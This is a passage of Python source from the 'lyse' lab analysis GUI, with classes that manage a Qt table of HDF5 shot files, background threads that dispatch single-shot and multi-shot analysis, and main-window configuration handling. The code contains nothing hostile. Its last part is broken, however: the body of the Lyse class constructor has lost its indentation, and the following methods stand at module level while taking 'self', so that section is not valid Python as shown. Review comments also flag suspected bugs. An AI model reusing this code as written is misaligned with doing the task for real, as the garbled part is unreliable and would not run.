            # Otherwise if {file} isn't already in there, append it to the other args:
            viewer_args = [shot_filepath] + viewer_args.split()
        try:
            subprocess.Popen([viewer_path] + viewer_args)
        except Exception as e:
            error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
                         (self.exp_config.config_path, str(e)))
    def set_columns_visible(self, columns_visible):
        """Apply a {column_index: bool} visibility mapping to the view."""
        self.columns_visible = columns_visible
        for column_index, visible in columns_visible.items():
            self._view.setColumnHidden(column_index, not visible)
    def update_column_levels(self):
        """Pads the keys and values of our lists of column names so that
        they still match those in the dataframe after the number of
        levels in its multiindex has increased (the number of levels never
        decreases, given the current implementation of concat_with_padding())"""
        extra_levels = self.dataframe.columns.nlevels - self.nlevels
        if extra_levels > 0:
            self.nlevels = self.dataframe.columns.nlevels
            column_indices = {}
            column_names = {}
            for column_name in self.column_indices:
                if not isinstance(column_name, tuple):
                    # It's one of our special columns
                    new_column_name = column_name
                else:
                    new_column_name = column_name + ('',) * extra_levels
                column_index = self.column_indices[column_name]
                column_indices[new_column_name] = column_index
                column_names[column_index] = new_column_name
            self.column_indices = column_indices
            self.column_names = column_names
    @inmain_decorator()
    def mark_as_deleted_off_disk(self, filepath):
        """Flag a shot's status item as deleted/unreadable on disk and set its
        progress to 100% so analysis is not re-attempted on it."""
        # Confirm the shot hasn't been removed from lyse (we are in the main
        # thread so there is no race condition in checking first)
        if not filepath in self.dataframe['filepath'].values:
            # Shot has been removed from FileBox, nothing to do here:
            return
        row_number = self.row_number_by_filepath[filepath]
        status_item = self._model.item(row_number, self.COL_STATUS)
        already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
        if already_marked_as_deleted:
            return
        # Icon only displays if percent completion is 100. This is also
        # important so that the shot is not picked up as analysis
        # incomplete and analysis re-attempted on it.
        status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
        status_item.setData(100, self.ROLE_STATUS_PERCENT)
        status_item.setToolTip("Shot has been deleted off disk or is unreadable")
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
        app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)
    @inmain_decorator()
    def infer_objects(self):
        """Convert columns in the dataframe with dtype 'object' into compatible, more
        specific types, if possible. This improves pickling performance and ensures
        multishot analysis code does not encounter columns with dtype 'object' for
        non-mixed numerical data, which it might choke on.
        """
        self.dataframe = self.dataframe.infer_objects()
    @inmain_decorator()
    def update_row(self, filepath, dataframe_already_updated=False, status_percent=None, new_row_data=None, updated_row_data=None):
        """Update a row in the dataframe and Qt model to the data in the HDF5
        file for that shot. Also sets the percent done, if specified.

        Exactly one of new_row_data (a full replacement row, as returned by
        get_dataframe_from_shot) or updated_row_data (a {(group, name): value}
        mapping of changed entries) must be provided, unless
        dataframe_already_updated is True."""
        # To speed things up block signals to the model during update
        self._model.blockSignals(True)
        # Update the row in the dataframe first:
        if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
            raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
        try:
            row_number = self.row_number_by_filepath[filepath]
        except KeyError:
            # Row has been deleted, nothing to do here:
            # NOTE(review): this early return (and the raise above) leaves
            # the model's signals blocked — confirm whether intended.
            return
        filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
        assert filepath == self.dataframe.at[row_number, filepath_colname]
        if updated_row_data is not None and not dataframe_already_updated:
            for group, name in updated_row_data:
                column_name = (group, name) + ('',) * (self.nlevels - 2)
                value = updated_row_data[group, name]
                try:
                    self.dataframe.at[row_number, column_name] = value
                except ValueError:
                    # did the column not already exist when we tried to set an iterable?
                    if not column_name in self.dataframe.columns:
                        # create it with a non-iterable and then overwrite with the iterable value:
                        self.dataframe.at[row_number, column_name] = None
                    else:
                        # Incompatible datatype - convert the datatype of the column to
                        # 'object'
                        self.dataframe[column_name] = self.dataframe[column_name].astype('object')
                    # Now that the column exists and has dtype object, we can set the value:
                    self.dataframe.at[row_number, column_name] = value
            dataframe_already_updated = True
        if not dataframe_already_updated:
            if new_row_data is None:
                raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
                                 "by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
            self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
            self.update_column_levels()
        # Check and create necessary new columns in the Qt model:
        new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
        new_columns_start = self._model.columnCount()
        self._model.insertColumns(new_columns_start, len(new_column_names))
        for i, column_name in enumerate(sorted(new_column_names)):
            # Set the header label of the new column:
            column_number = new_columns_start + i
            self.column_names[column_number] = column_name
            self.column_indices[column_name] = column_number
            if column_name in self.deleted_columns_visible:
                # Restore the former visibility of this column if we've
                # seen one with its name before:
                visible = self.deleted_columns_visible[column_name]
                self.columns_visible[column_number] = visible
                self._view.setColumnHidden(column_number, not visible)
            else:
                # new columns are visible by default:
                self.columns_visible[column_number] = True
            column_name_as_string = '\n'.join(column_name).strip()
            header_item = QtGui.QStandardItem(column_name_as_string)
            header_item.setToolTip(column_name_as_string)
            self._model.setHorizontalHeaderItem(column_number, header_item)
        # Check and remove any no-longer-needed columns in the Qt model:
        defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
                                - {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
        defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
        for column_number in sorted(defunct_column_indices, reverse=True):
            # Remove columns from the Qt model. In reverse order so that
            # removals do not change the position of columns yet to be
            # removed.
            self._model.removeColumn(column_number)
            # Save whether or not the column was visible when it was
            # removed (so that if it is re-added the visibility will be retained):
            self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
            del self.column_names[column_number]
            del self.columns_visible[column_number]
        if defunct_column_indices:
            # Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
            self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
            self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
            # Update the inverse mapping of self.column_names:
            self.column_indices = {name: index for index, name in self.column_names.items()}
        # Update the data in the Qt model:
        dataframe_row = self.dataframe.iloc[row_number].to_dict()
        for column_number, column_name in self.column_names.items():
            if not isinstance(column_name, tuple):
                # One of our special columns, does not correspond to a column in the dataframe:
                continue
            if updated_row_data is not None and column_name not in updated_row_data:
                continue
            value = dataframe_row[column_name]
            if isinstance(value, float):
                value_str = scientific_notation(value)
            else:
                value_str = str(value)
            lines = value_str.splitlines()
            if len(lines) > 1:
                # Show only the first line of multiline values in the cell;
                # the full value is available via the tooltip below:
                short_value_str = lines[0] + ' ...'
            else:
                short_value_str = value_str
            item = self._model.item(row_number, column_number)
            if item is None:
                # This is the first time we've written a value to this part of the model:
                item = QtGui.QStandardItem(short_value_str)
                item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
                self._model.setItem(row_number, column_number, item)
            else:
                item.setText(short_value_str)
            item.setToolTip(repr(value))
        for i, column_name in enumerate(sorted(new_column_names)):
            # Resize any new columns to fit contents:
            column_number = new_columns_start + i
            self._view.resizeColumnToContents(column_number)
        if status_percent is not None:
            status_item = self._model.item(row_number, self.COL_STATUS)
            status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
        if new_column_names or defunct_column_names:
            self.columns_changed.emit()
        # unblock signals to the model and tell it to update
        self._model.blockSignals(False)
        self._model.layoutChanged.emit()
    def new_row(self, filepath, done=False):
        """Return [status_item, name_item] for appending a new shot row.

        done=True marks the shot as already fully analysed (100%)."""
        status_item = QtGui.QStandardItem()
        if done:
            status_item.setData(100, self.ROLE_STATUS_PERCENT)
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
        else:
            status_item.setData(0, self.ROLE_STATUS_PERCENT)
            # NOTE(review): both branches set the 'tick' icon (with slightly
            # different resource paths); presumably the not-done branch was
            # meant to use a different icon — confirm.
            status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
        name_item = QtGui.QStandardItem(filepath)
        return [status_item, name_item]
    def renumber_rows(self, add_from=0):
        """Add/update row indices - the rows are numbered in simple sequential
        order for easy comparison with the dataframe. add_from allows you to
        only add numbers for new rows from the given index as a performance
        optimisation, though if the number of digits changes, all rows will
        still be renumbered. add_from should not be used if rows have been
        deleted."""
        n_digits = len(str(self._model.rowCount()))
        if n_digits != self._previous_n_digits:
            # All labels must be updated:
            add_from = 0
            self._previous_n_digits = n_digits
        if add_from == 0:
            self.row_number_by_filepath = {}
        for row_number in range(add_from, self._model.rowCount()):
            vertical_header_item = self._model.verticalHeaderItem(row_number)
            row_number_str = str(row_number).rjust(n_digits)
            vert_header_text = '{}. '.format(row_number_str)
            filepath_item = self._model.item(row_number, self.COL_FILEPATH)
            filepath = filepath_item.text()
            self.row_number_by_filepath[filepath] = row_number
            if self.integer_indexing:
                # Label rows by sequence/run/repeat numbers from the dataframe
                # instead of by shot file basename:
                header_cols = ['sequence_index', 'run number', 'run repeat']
                header_strings = []
                for col in header_cols:
                    val = self.dataframe[col].values[row_number]
                    if pandas.notna(val):
                        header_strings.append('{:04d}'.format(val))
                    else:
                        header_strings.append('----')
                vert_header_text += ' | '.join(header_strings)
            else:
                basename = os.path.splitext(os.path.basename(filepath))[0]
                vert_header_text += basename
            vertical_header_item.setText(vert_header_text)
    @inmain_decorator()
    def add_files(self, filepaths, new_row_data, done=False):
        """Add files to the dataframe model. New_row_data should be a
        dataframe containing the new rows."""
        to_add = []
        # Check for duplicates:
        for filepath in filepaths:
            if filepath in self.row_number_by_filepath or filepath in to_add:
                app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
                if new_row_data is not None:
                    # Drop the duplicate's row from the incoming data too, so
                    # new_row_data stays aligned with to_add:
                    df_row_index = np.where(new_row_data['filepath'].values == filepath)
                    new_row_data = new_row_data.drop(df_row_index[0])
                    new_row_data.index = pandas.Index(range(len(new_row_data)))
            else:
                to_add.append(filepath)
        assert len(new_row_data) == len(to_add)
        if to_add:
            # Update the dataframe:
            self.dataframe = concat_with_padding(self.dataframe, new_row_data)
            self.update_column_levels()
        app.filebox.set_add_shots_progress(None, None, "updating filebox")
        for filepath in to_add:
            # Add the new rows to the Qt model:
            self._model.appendRow(self.new_row(filepath, done=done))
            vert_header_item = QtGui.QStandardItem('...loading...')
            self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
            self._view.resizeRowToContents(self._model.rowCount() - 1)
        self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
        # Update the Qt model:
        for filepath in to_add:
            self.update_row(filepath, dataframe_already_updated=True)
    @inmain_decorator()
    def get_first_incomplete(self):
        """Returns the filepath of the first shot in the model that has not
        been analysed"""
        for row in range(self._model.rowCount()):
            status_item = self._model.item(row, self.COL_STATUS)
            if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
                filepath_item = self._model.item(row, self.COL_FILEPATH)
                return filepath_item.text()
        # Implicitly returns None when every shot is at 100%.
class FileBox(object):
    """The panel listing open shot files, plus the background machinery that
    receives incoming shots and drives single-shot/multi-shot analysis.

    Two daemon threads are started: one draining incoming_queue into the
    DataFrameModel, and one dispatching analysis jobs over the
    to_singleshot/to_multishot queues and consuming results from the
    corresponding from_* queues.
    """
    def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
        """Build the UI, create the shots model, and start the worker threads.

        container: Qt layout the filebox UI is added to.
        to_/from_singleshot, to_/from_multishot: queues connecting this
            filebox to the two RoutineBoxes.
        """
        self.exp_config = exp_config
        self.to_singleshot = to_singleshot
        self.to_multishot = to_multishot
        self.from_singleshot = from_singleshot
        self.from_multishot = from_multishot
        self.logger = logging.getLogger('lyse.FileBox')
        self.logger.info('starting')
        loader = UiLoader()
        loader.registerCustomWidget(TableView)
        self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
        self.ui.progressBar_add_shots.hide()
        container.addWidget(self.ui)
        self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
        set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
        self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
        self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
        self.connect_signals()
        self.analysis_paused = False
        self.multishot_required = False
        # An Event to let the analysis thread know to check for shots that
        # need analysing, rather than using a time.sleep:
        self.analysis_pending = threading.Event()
        # The folder that the 'add shots' dialog will open to:
        self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
        # A queue for storing incoming files from the ZMQ server so
        # the server can keep receiving files even if analysis is slow
        # or paused:
        self.incoming_queue = queue.Queue()
        # Start the thread to handle incoming files, and store them in
        # a buffer if processing is paused:
        self.incoming = threading.Thread(target=self.incoming_buffer_loop)
        self.incoming.daemon = True
        self.incoming.start()
        self.analysis = threading.Thread(target = self.analysis_loop)
        self.analysis.daemon = True
        self.analysis.start()
    def connect_signals(self):
        """Connect all UI widget signals to their handlers."""
        self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
        self.shots_model.columns_changed.connect(self.on_columns_changed)
        self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
        self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
        self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
        self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
        self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
        self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
    def on_edit_columns_clicked(self):
        """Show the column-visibility editor dialog."""
        self.edit_columns_dialog.show()
    def on_columns_changed(self):
        """Push the model's current column set into the edit-columns dialog."""
        column_names = self.shots_model.column_names
        columns_visible = self.shots_model.columns_visible
        self.edit_columns_dialog.update_columns(column_names, columns_visible)
    def on_add_shot_files_clicked(self):
        """Prompt the user for shot files and queue them for loading."""
        shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
                                                            'Select shot files',
                                                            self.last_opened_shots_folder,
                                                            "HDF5 files (*.h5)")
        if type(shot_files) is tuple:
            # Some Qt bindings return (filenames, selected_filter):
            shot_files, _ = shot_files
        if not shot_files:
            # User cancelled selection
            return
        # Convert to standard platform specific path, otherwise Qt likes forward slashes:
        shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
        # Save the containing folder for use next time we open the dialog box:
        self.last_opened_shots_folder = os.path.dirname(shot_files[0])
        # Queue the files to be opened:
        for filepath in shot_files:
            self.incoming_queue.put(filepath)
    def on_analysis_running_toggled(self, pressed):
        """Pause or resume the analysis loop from the toggle button."""
        if pressed:
            self.analysis_paused = True
            self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
            self.ui.pushButton_analysis_running.setText('Analysis paused')
        else:
            self.analysis_paused = False
            self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
            self.ui.pushButton_analysis_running.setText('Analysis running')
            self.analysis_pending.set()
    def on_mark_selection_not_done_clicked(self):
        """Reset selected shots to not-analysed and wake the analysis loop."""
        self.shots_model.mark_selection_not_done()
        # Let the analysis loop know to look for these shots:
        self.analysis_pending.set()
    def on_run_multishot_analysis_clicked(self):
        """Request a multishot analysis run and wake the analysis loop."""
        self.multishot_required = True
        self.analysis_pending.set()
    def set_columns_visible(self, columns_visible):
        """Forward a column-visibility mapping to the shots model."""
        self.shots_model.set_columns_visible(columns_visible)
    @inmain_decorator()
    def set_add_shots_progress(self, completed, total, message):
        """Update the 'adding shots' progress bar.

        completed/total update the bar's value/maximum when not None; the bar
        is hidden when completed == total with no message. message is shown in
        the bar's format string."""
        self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
        if completed == total and message is None:
            self.ui.progressBar_add_shots.hide()
        else:
            if total is not None:
                self.ui.progressBar_add_shots.setMaximum(total)
            if completed is not None:
                self.ui.progressBar_add_shots.setValue(completed)
            if self.ui.progressBar_add_shots.isHidden():
                self.ui.progressBar_add_shots.show()
        if completed is None and total is None and message is not None:
            # Ensure a repaint when only the message changes:
            self.ui.progressBar_add_shots.repaint()
    def incoming_buffer_loop(self):
        """We use a queue as a buffer for incoming shots. We don't want to hang and not
        respond to a client submitting shots, so we just let shots pile up here until we can get to them.
        The downside to this is that we can't return errors to the client if the shot cannot be added,
        but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
        the experiment on account of errors from the analyis stage, so what's the point of passing errors to it?
        We'll just raise errors here and the user can decide what to do with them."""
        logger = logging.getLogger('lyse.FileBox.incoming')
        # HDF5 prints lots of errors by default, for things that aren't
        # actually errors. These are silenced on a per thread basis,
        # and automatically silenced in the main thread when h5py is
        # imported. So we'll silence them in this thread too:
        h5py._errors.silence_errors()
        n_shots_added = 0
        while True:
            try:
                filepaths = []
                filepath = self.incoming_queue.get()
                filepaths.append(filepath)
                if self.incoming_queue.qsize() == 0:
                    # Wait momentarily in case more arrive so we can batch process them:
                    time.sleep(0.1)
                # Batch process to decrease number of dataframe concatenations:
                batch_size = len(self.shots_model.dataframe) // 3 + 1
                while True:
                    try:
                        filepath = self.incoming_queue.get(False)
                    except queue.Empty:
                        break
                    else:
                        filepaths.append(filepath)
                        if len(filepaths) >= batch_size:
                            break
                logger.info('adding:\n%s' % '\n'.join(filepaths))
                if n_shots_added == 0:
                    total_shots = self.incoming_queue.qsize() + len(filepaths)
                    self.set_add_shots_progress(1, total_shots, "reading shot files")
                # Remove duplicates from the list (preserving order) in case the
                # client sent the same filepath multiple times:
                filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
                # We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
                dataframes = []
                indices_of_files_not_found = []
                for i, filepath in enumerate(filepaths):
                    try:
                        dataframe = get_dataframe_from_shot(filepath)
                        dataframes.append(dataframe)
                    except IOError:
                        app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
                        indices_of_files_not_found.append(i)
                    n_shots_added += 1
                    shots_remaining = self.incoming_queue.qsize()
                    total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
                    self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
                self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
                if dataframes:
                    new_row_data = concat_with_padding(*dataframes)
                else:
                    new_row_data = None
                # Do not add the shots that were not found on disk. Reverse
                # loop so that removing an item doesn't change the indices of
                # subsequent removals:
                for i in reversed(indices_of_files_not_found):
                    del filepaths[i]
                if filepaths:
                    self.shots_model.add_files(filepaths, new_row_data)
                    # Let the analysis loop know to look for new shots:
                    self.analysis_pending.set()
                if shots_remaining == 0:
                    self.set_add_shots_progress(n_shots_added, total_shots, None)
                    n_shots_added = 0 # reset our counter for the next batch
            except Exception:
                # Keep this incoming loop running at all costs, but make the
                # otherwise uncaught exception visible to the user:
                zprocess.raise_exception_in_thread(sys.exc_info())
    def analysis_loop(self):
        """Worker-thread loop: wait for analysis_pending, then analyse every
        incomplete shot and run multishot analysis when requested."""
        logger = logging.getLogger('lyse.FileBox.analysis_loop')
        # HDF5 prints lots of errors by default, for things that aren't
        # actually errors. These are silenced on a per thread basis,
        # and automatically silenced in the main thread when h5py is
        # imported. So we'll silence them in this thread too:
        h5py._errors.silence_errors()
        while True:
            try:
                self.analysis_pending.wait()
                self.analysis_pending.clear()
                at_least_one_shot_analysed = False
                while True:
                    if not self.analysis_paused:
                        # Find the first shot that has not finished being analysed:
                        filepath = self.shots_model.get_first_incomplete()
                        if filepath is not None:
                            logger.info('analysing: %s'%filepath)
                            self.do_singleshot_analysis(filepath)
                            at_least_one_shot_analysed = True
                        if filepath is None and at_least_one_shot_analysed:
                            self.multishot_required = True
                        if filepath is None:
                            break
                        if self.multishot_required:
                            logger.info('doing multishot analysis')
                            self.do_multishot_analysis()
                    else:
                        logger.info('analysis is paused')
                        break
                if self.multishot_required:
                    logger.info('doing multishot analysis')
                    self.do_multishot_analysis()
            except Exception:
                etype, value, tb = sys.exc_info()
                orig_exception = ''.join(traceback.format_exception_only(etype, value))
                message = ('Analysis loop encountered unexpected exception. ' +
                           'This is a bug and should be reported. The analysis ' +
                           'loop is continuing, but lyse may be in an inconsistent state. '
                           'Restart lyse, or continue at your own risk. '
                           'Original exception was:\n\n' + orig_exception)
                # Raise the exception in a thread so we can keep running
                zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
                self.pause_analysis()
    @inmain_decorator()
    def pause_analysis(self):
        # This automatically triggers the slot that sets self.analysis_paused
        self.ui.pushButton_analysis_running.setChecked(True)
    def do_singleshot_analysis(self, filepath):
        """Send one shot to the singleshot routinebox and process its result
        stream ('progress'/'done'/'error' signals) until it finishes."""
        # Check the shot file exists before sending it to the singleshot
        # routinebox. This does not guarantee it won't have been deleted by
        # the time the routinebox starts running analysis on it, but by
        # detecting it now we can most of the time avoid the user code
        # coughing exceptions due to the file not existing. Which would also
        # not be a problem, but this way we avoid polluting the outputbox with
        # more errors than necessary.
        if not os.path.exists(filepath):
            self.shots_model.mark_as_deleted_off_disk(filepath)
            return
        self.to_singleshot.put(filepath)
        while True:
            signal, status_percent, updated_data = self.from_singleshot.get()
            for file in updated_data:
                # Update the data for all the rows with new data:
                self.shots_model.update_row(file, updated_row_data=updated_data[file])
            # Update the status percent for the the row on which analysis is actually running:
            self.shots_model.update_row(filepath, status_percent=status_percent, dataframe_already_updated=True)
            if signal == 'done':
                return
            if signal == 'error':
                if not os.path.exists(filepath):
                    # Do not pause if the file has been deleted. An error is
                    # no surprise there:
                    self.shots_model.mark_as_deleted_off_disk(filepath)
                else:
                    self.pause_analysis()
                return
            if signal == 'progress':
                continue
            raise ValueError('invalid signal %s' % str(signal))
    def do_multishot_analysis(self):
        """Trigger multishot analysis and process its result stream until it
        reports 'done' (clearing multishot_required) or 'error' (pausing)."""
        self.to_multishot.put(None)
        while True:
            signal, _, updated_data = self.from_multishot.get()
            for file in updated_data:
                self.shots_model.update_row(file, updated_row_data=updated_data[file])
            if signal == 'done':
                self.multishot_required = False
                return
            elif signal == 'error':
                self.pause_analysis()
                return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
    """Ask every analysis routine (single-shot and multi-shot) to end its worker process."""
    all_routines = list(self.singleshot_routinebox.routines)
    all_routines.extend(self.multishot_routinebox.routines)
    for analysis_routine in all_routines:
        analysis_routine.end_child()
def workers_terminated(self):
    """Poll each routine's worker subprocess and report which have exited.

    Returns a dict mapping routine filepath -> True if that routine's
    worker process has terminated, False otherwise.
    """
    routines = self.singleshot_routinebox.routines + self.multishot_routinebox.routines
    # poll() refreshes returncode for any process that has already exited:
    for routine in routines:
        routine.worker.poll()
    return {routine.filepath: routine.worker.returncode is not None
            for routine in routines}
def are_you_sure(self):
    """Prompt the user to save the changed configuration before quitting.

    Returns False if the user cancelled quitting, True otherwise.  When the
    user answers Yes, the configuration is saved before returning True.
    """
    message = ('Current configuration (which scripts are loaded and other GUI state) '
               'has changed: save config file \'%s\'?' % self.last_save_config_file)
    buttons = (QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No
               | QtWidgets.QMessageBox.Cancel)
    answer = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message, buttons)
    if answer == QtWidgets.QMessageBox.Cancel:
        # User backed out of quitting altogether:
        return False
    if answer == QtWidgets.QMessageBox.Yes:
        self.save_configuration(self.last_save_config_file)
    return True
def on_close_event(self):
    """Handle the main window closing.

    Silently saves when only window geometry changed, otherwise asks the
    user about unsaved changes.  Terminates all analysis workers and
    returns True to allow the close, or False to veto it.
    """
    current = self.get_save_data()
    changed = self.last_save_data is not None and current != self.last_save_data
    if changed:
        if self.only_window_geometry_is_different(current, self.last_save_data):
            # Only geometry differs - save without nagging the user:
            self.save_configuration(self.last_save_config_file)
            self.terminate_all_workers()
            return True
        if not self.are_you_sure():
            # User cancelled the close:
            return False
    self.terminate_all_workers()
    return True
def on_save_configuration_triggered(self):
    """Save the configuration to the last used file, or prompt for one.

    Falls back to 'Save configuration as...' when no config file has been
    chosen yet, enabling the related menu actions afterwards.
    """
    if self.last_save_config_file is not None:
        self.save_configuration(self.last_save_config_file)
        return
    # No file chosen yet - behave like 'Save configuration as...':
    self.on_save_configuration_as_triggered()
    self.ui.actionSave_configuration_as.setEnabled(True)
    self.ui.actionRevert_configuration.setEnabled(True)
def on_revert_configuration_triggered(self):
    """Reload the configuration from the last saved file, discarding changes.

    Asks for confirmation first; shows an error dialog when there is
    nothing to revert.
    """
    current = self.get_save_data()
    if self.last_save_data is None or current == self.last_save_data:
        error_dialog('no changes to revert')
        return
    message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
    reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
                                           QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
    if reply == QtWidgets.QMessageBox.Yes:
        self.load_configuration(self.last_save_config_file)
def on_save_configuration_as_triggered(self):
    """Prompt for a filename and save the current configuration to it.

    The dialog's default location is the last-used config file if there is
    one, otherwise a per-experiment 'app_saved_configs/.../lyse' folder
    (created on demand, and written into labconfig if the option is missing).
    """
    if self.last_save_config_file is not None:
        default = self.last_save_config_file
    else:
        try:
            default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
        except LabConfig.NoOptionError:
            # Option missing from labconfig: write a sensible default back so
            # other apps see the same location (interpolation keys are
            # expanded by LabConfig, not here):
            self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
            default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
        if not os.path.exists(default_path):
            os.makedirs(default_path)
        default = os.path.join(default_path, 'lyse.ini')
    save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
                    'Select file to save current lyse configuration',
                    default,
                    "config files (*.ini)")
    # Some Qt bindings return (filename, filter) tuples:
    if type(save_file) is tuple:
        save_file, _ = save_file
    if not save_file:
        # User cancelled
        return
    # Convert to standard platform specific path, otherwise Qt likes
    # forward slashes:
    save_file = os.path.abspath(save_file)
    self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
    """Return True if all non-geometry entries of the two save states agree.

    Window size/position and splitter settings are ignored in the
    comparison, so a True result means nothing but the window geometry
    (if anything) has changed.
    """
    geometry_keys = {'window_size', 'window_pos', 'splitter',
                     'splitter_vertical', 'splitter_horizontal'}
    return all(old_data[key] == value
               for key, value in current_data.items()
               if key not in geometry_keys)
def get_save_data(self):
    """Collect the GUI state to be persisted in a config file.

    Returns a dict with: the loaded single-shot and multi-shot routines
    (filepath plus checkbox state), last-used folders, the filebox pause
    state, window size/position, screen geometry and splitter positions.
    """
    save_data = {}
    # Single-shot routines: pair each routine's filepath with its
    # 'active' checkbox state from the model:
